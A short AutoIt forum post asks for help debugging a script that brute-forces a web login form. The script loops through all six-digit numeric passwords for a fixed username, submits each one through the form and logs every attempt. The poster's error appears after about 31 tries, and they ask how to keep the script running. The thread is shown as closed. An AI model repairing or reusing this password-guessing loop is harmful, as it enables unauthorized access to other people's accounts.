Jump to content

$o_object.value = $s_newvalue^ ERROR


thanh159
 Share

Recommended Posts

for $password = 1 to 999999 step + 1 
$password = StringFormat("%.6d", $password)

; Set field values and submit the form
$o_form = _IEFormGetObjByName ($oIE, "form2")
$o_login = _IEFormElementGetObjByName ($o_form, "Username")
$o_password = _IEFormElementGetObjByName ($o_form, "Password")
$o_signin = _IEFormElementGetObjByName ($o_form, "Login")

_IEFormElementSetValue ($o_login, $username)
_IEFormElementSetValue ($o_password, $password)
_IEAction ($o_signin, "click")
_FileWriteLog("Startup.log",$password)
next

$password only reached value 31 then it shown

C

:\Program Files\AutoIt3\Include\IE.au3 (1291) : ==> The requested action with this object has failed.:
$o_object.value = $s_newvalue
$o_object.value = $s_newvalue^ ERROR

how can i fix it

sorry for my bad english :x

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...